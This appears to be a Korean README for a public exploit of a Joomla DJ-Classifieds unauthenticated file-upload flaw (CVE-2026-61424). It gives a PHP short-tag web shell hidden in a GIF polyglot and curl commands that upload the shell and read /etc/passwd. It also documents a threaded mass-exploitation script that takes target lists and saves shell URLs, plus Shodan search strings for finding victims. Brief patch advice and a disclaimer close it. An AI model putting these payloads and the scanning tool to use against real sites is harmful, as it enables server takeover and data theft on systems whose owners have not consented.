
DJ-Classifieds Joomla 컴포넌트 인증되지 않은 파일 업로드 RCE. PHP short tags를 통한 3-문자열 필터 우회. CVSS 10.0 | CWE-434 | com_djclassifieds < 3.11.2
Joomla용 DJ-Classifieds의 인증되지 않은 임의 파일 업로드 취약점입니다. imageupload 작업 엔드포인트는 인증 없이 파일 업로드를 처리하며 3-문자열 차단 목록(<?php, eval(, base64)에 의존하는데, 이는 PHP 짧은 시작 태그(<?=)를 사용해 쉽게 우회할 수 있습니다. GIF 폴리글롯과 결합하면 업로드된 파일은 완전한 기능을 갖춘 PHP 웹쉘을 포함하면서도 모든 이미지 검증 검사를 통과합니다.
| 필드 | 설명 |
|---|---|
| CVE | CVE-2026-61424 |
| 제품 | DJ-Classifieds (DJ-Extensions의 Joomla 확장) |
| CVSS 4.0 | 10.0 (치명적) |
| 유형 | CWE-434 — 무제한 파일 업로드 |
| 발견 | Phil Taylor / mySites.guru — 2026년 7월 16일 |
| 악용 현황 | 공개 이전에 실제 환경에서 악용이 확인됨 |
| 상태 | 버전 |
|---|---|
| 취약 | 1.0 — 3.11.1 |
| 패치됨 | 3.11.2 (2026년 7월 20일) |
administrator/components/com_djclassifieds/lib/djupload.php의 upload() 메서드는 인증 검사와 CSRF 토큰 검증 없이 imageupload 작업에 매핑됩니다.
// administrator/components/com_djclassifieds/lib/djupload.php
// imageupload task → upload() method
// MISSING: JFactory::getUser() auth check
// MISSING: JSession::checkToken() CSRF check
$name = $_REQUEST['name'] ?? $_REQUEST['filename'] ?? '';
$raw_body = file_get_contents('php://input');
// ... writes file to tmp/djupload/<name>
콘텐츠 스캐너는 세 가지 리터럴 문자열만 차단 목록에 포함합니다:
// The ONLY malicious-content check in the entire upload handler:
if (preg_match('/<\?php|eval\(|base64/i', $fileContent)) {
die('Malicious file detected');
}
이 검사는 <?php, eval(, base64는 차단하지만 PHP 짧은 시작 태그는 차단하지 않습니다:
<?=system($_GET['c']);?> ← 0/3 blocked strings → PASSES
PHP 짧은 출력 태그(<?=)는 PHP 5.4부터 기본적으로 활성화되어 있습니다.
GIF89a 헤더 + <?=system($_GET['c']);?>name=shell.gif를 포함하여 index.php?option=com_djclassifieds&task=imageupload로 POST 전송.gif 확장자 ✓ getimagesize() ✓ <?php/eval(/base64 없음 ✓tmp/djupload/<shell>.gif에 저장됨https://target.com/tmp/djupload/shell.gif?c=id| 파일 | 역할 |
|---|---|
administrator/components/com_djclassifieds/lib/djupload.php | upload() 메서드 — 인증 없음, 3-문자열 필터 |
components/com_djclassifieds/controller.php | imageupload 작업을 upload()로 라우팅 |
administrator/components/com_djclassifieds/djclassifieds.xml | <version> 태그를 통한 버전 노출 |
공개 전 실제 환경에서 관찰된 익명 스캐너의 탐지 시도:
POST /index.php?option=com_djclassifieds&task=imageupload
name=<random>.gif filename=<random>.gif
— no cookie, no session, no referer
git clone https://github.com/shinthink/CVE-2026-61424.git
cd CVE-2026-61424
pip install -r requirements.txt
python cve_2026_61424.py -t target.com
python cve_2026_61424.py -f targets.txt -o shells.txt
| 플래그 | 설명 | 기본값 |
|---|---|---|
-t, --target | 단일 대상 호스트 | — |
-f, --file | 대상 목록이 포함된 파일 (줄당 하나, # 주석) | — |
-o, --output | RCE URL을 파일에 저장 | — |
--threads | 대량 모드용 작업자 스레드 | 30 |
--no-cleanup | RCE 후 셸을 삭제하지 않음 | False |
--debug | 디버그 출력 | False |
$ python cve_2026_61424.py -t target.com
Host : target.com
DJ-Classifieds: YES v3.11.1
Upload : YES
RCE : YES
Shell : https://target.com/tmp/djupload/img_abc123.gif
Output : DJ-SHELL-OK Linux ... uid=33(www-data) gid=33(www-data) ...
Time : 2.1s
# Step 1 — Upload polyglot shell
curl -sk -X POST \
"https://target.com/index.php?option=com_djclassifieds&task=imageupload&name=shell.gif&filename=shell.gif" \
-H "Content-Type: image/gif" \
--data-binary @polyglot.gif
# Step 2 — Verify RCE
curl -sk "https://target.com/tmp/djupload/shell.gif?c=id;hostname;uname+-a"
# Step 3 — Execute arbitrary commands
curl -sk "https://target.com/tmp/djupload/shell.gif?c=cat%20/etc/passwd"
# DJ-Classifieds component
body="com_djclassifieds"
# Version disclosure (XML manifest)
body="DJ-Classifieds" && body="<version>"
# Exposed djupload directory
body="Index of" && body="djupload"
# Shodan
http.html:"com_djclassifieds" http.component:"Joomla"
upload() 호출 전 JFactory::getUser() 게스트 확인imageupload 작업에 JSession::checkToken() 적용jpg, jpeg, png, gif)이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용하십시오. 소유한 시스템 또는 명시적 테스트 허가를 받은 시스템에만 사용하십시오. 저자는 오용이나 피해에 대해 책임을 지지 않습니다.
| 리소스 | 링크 |
|---|---|
| IONIX Threat Center | ionix.io/threat-center/cve-2026-61424 |
| mySites.guru 발견 정보 | mysites.guru/blog/dj-classifieds-unauthenticated-file-upload |
| DJ-Extensions 보안 릴리스 | dj-extensions.com/blog/general/dj-classifieds-3-11-2-security-release |
| CVE.org 기록 | cve.org/CVERecord?id=CVE-2026-61424 |
| INCIBE-CERT | incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2026-61424 |
DJ-Extensions 또는 mySites.guru와 관련이 없습니다.